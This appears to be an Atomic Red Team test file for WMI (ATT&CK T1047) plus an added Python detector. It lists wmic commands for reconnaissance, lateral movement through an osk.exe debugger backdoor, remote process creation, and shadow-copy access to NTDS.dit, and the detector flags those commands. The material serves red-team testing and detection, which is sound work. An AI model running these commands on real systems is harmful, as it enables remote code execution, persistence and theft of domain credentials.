atomic-red-team/Windows/Execution/Windows_Management_Instrumentation.md
caseysmithrc ac8dd2cfec Initial Commit
Initial Checkin
2017-10-11 10:35:17 -07:00
## Windows Management Instrumentation
MITRE ATT&CK Technique: [T1047](https://attack.mitre.org/wiki/Technique/T1047)
### Reconnaissance
Input:

    wmic useraccount get /ALL

Input:

    wmic process get caption,executablepath,commandline

Input:

    wmic qfe get description,installedOn /format:csv

Input:

    wmic /node:"192.168.0.1" service where (caption like "%sql server (%")

Input:

    get-wmiobject -class "win32_share" -namespace "root\CIMV2" -computer "targetname"

### Lateral Movement
Input:

    wmic /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"

Input:

    wmic /NODE:"192.168.0.1" process call create "evil.exe"

### Privilege Escalation
Input:

    wmic /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"

Input:

    wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
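
### Detection example

An added example, not part of the original atomic-red-team file: a triage pass over process-creation events that flags the `wmic` patterns listed above and redacts `/password:` values before they reach an alert. The event field names (`Computer`, `CommandLine`), host names, rule labels and severity levels are assumptions made for illustration.

```python
import re

# Rules keyed to the wmic.exe patterns listed on this page; first match wins.
RULES = [
    ("remote-process-create",
     re.compile(r"/node:\s*\S+.*\bprocess\s+call\s+create\b", re.I)),
    ("local-process-create", re.compile(r"\bprocess\s+call\s+create\b", re.I)),
    ("remote-query", re.compile(r"/node:\s*\S+", re.I)),
    ("recon-query",
     re.compile(r"\b(useraccount|qfe|process|service)\b.*\b(get|where)\b", re.I)),
]
# Payload strings from the page that raise severity: IFEO debugger key,
# shadow copy / NTDS.dit access, and at-scheduled jobs.
HIGH = re.compile(r"Image File Execution Options|vssadmin|ntds\.dit|\bat\s+\d", re.I)
# Matches wmic invoked bare, by full path, or quoted.
WMIC = re.compile(r'^"?([^"]*\\)?wmic(\.exe)?"?(\s|$)', re.I)
PASSWORD = re.compile(r"(/password:)\s*\S+", re.I)


def classify(command_line):
    """Return (rule label, severity) for a wmic command line, else None."""
    if not WMIC.match(command_line):
        return None
    for label, pattern in RULES:
        if pattern.search(command_line):
            if HIGH.search(command_line):
                return label, "high"
            return label, "low" if label == "recon-query" else "medium"
    return "other-wmic", "low"


def triage(events):
    """Return one alert per matching event, with credentials redacted."""
    alerts = []
    for ev in events:
        hit = classify(ev["CommandLine"])
        if hit:
            cmd = PASSWORD.sub(r"\1<redacted>", ev["CommandLine"])
            alerts.append({"host": ev["Computer"], "rule": hit[0],
                           "severity": hit[1], "cmd": cmd})
    return alerts


# Constructed sample events; hosts, account and password are made up.
SAMPLE = [
    {"Computer": "WS01", "CommandLine": r"wmic useraccount get /ALL"},
    {"Computer": "WS01", "CommandLine": r'C:\Windows\System32\wbem\WMIC.exe /node:"WS02" service where (caption like "%sql server (%")'},
    {"Computer": "WS01", "CommandLine": r'wmic /user:lab\tester /password:Example123 /node:WS02 process call create "reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v Debugger /d cmd.exe /f"'},
    {"Computer": "WS03", "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]
```
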